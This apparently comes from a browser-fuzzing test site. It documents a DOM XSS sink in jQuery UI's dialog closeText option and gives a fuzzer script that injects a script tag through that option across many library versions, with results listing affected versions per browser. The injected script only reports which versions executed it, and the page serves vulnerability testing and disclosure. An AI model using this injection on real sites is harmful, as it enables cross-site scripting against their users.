jQuery UI .dialog() closeText property DOM XSS Sink.

https://github.com/jquery/jquery-ui/pull/1622 . jQuery 2.1.4 is used as the base jQuery library. $('#div').dialog({ closeText: '<html injection>' });

By
skeptic_fx 1 Seen 1135 times
Tags
jquery jqueryui xss
Run this test now.

Results


Tested on
Chrome - 68 - Mac OS X
Fuzz data
1.11.4
1.11.3
1.11.2
1.11.1
1.11.0
1.10.4
1.10.3
1.10.2
1.10.1
1.10.0

Tested on
Safari - 9.1.2 - Mac OS X
Fuzz data
1.11.4
1.11.3
1.11.2
1.11.1
1.11.0
1.10.4
1.10.3
1.10.2
1.10.1
1.10.0

Tested on
Firefox - 60 - Windows 7
Fuzz data
1.11.4
1.11.3
1.11.2
1.11.1
1.11.0
1.10.4
1.10.3
1.10.2
1.10.1
1.10.0

Tested on
Chrome Mobile - 41 - Android
Fuzz data
1.11.4
1.11.3
1.11.2
1.11.1
1.11.0
1.10.4
1.10.3
1.10.2
1.10.1
1.10.0

Tested on
Googlebot - 2.1 - undefined
Fuzz data
1.11.4
1.11.3
1.11.2
1.11.1
1.11.0
1.10.4
1.10.3
1.10.2
1.10.1
1.10.0

User Script (FUZZER)

					
<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/***DS_JQUERYUI_VERSIONS***/jquery-ui.js"></script>

<script>
    $(document).ready(function () {
        $('#xss').dialog({ closeText: '<script>addResult("***DS_JQUERYUI_VERSIONS***")<\/script>' });
    });
</script>
</head>
<body>
<div id="xss" title="Dialog Title">Fuzz Content Here - ***DS_JQUERYUI_VERSIONS***</div> 
</body>

					
				

Fuzz Data (FUZZER)

					
//https://developers.google.com/speed/libraries/#jquery-ui
var DS_JQUERYUI_VERSIONS = ['1.11.4','1.11.3','1.11.2','1.11.1','1.11.0','1.10.4','1.10.3','1.10.2','1.10.1','1.10.0','1.9.2','1.9.1','1.9.0','1.8.24','1.8.23','1.8.22','1.8.21','1.8.20','1.8.19','1.8.18','1.8.17','1.8.16','1.8.15','1.8.14','1.8.13','1.8.12','1.8.11','1.8.10','1.8.9','1.8.8','1.8.7','1.8.6','1.8.5','1.8.4','1.8.2','1.8.1','1.8.0','1.7.3','1.7.2','1.7.1','1.7.0','1.6.0','1.5.3','1.5.2'];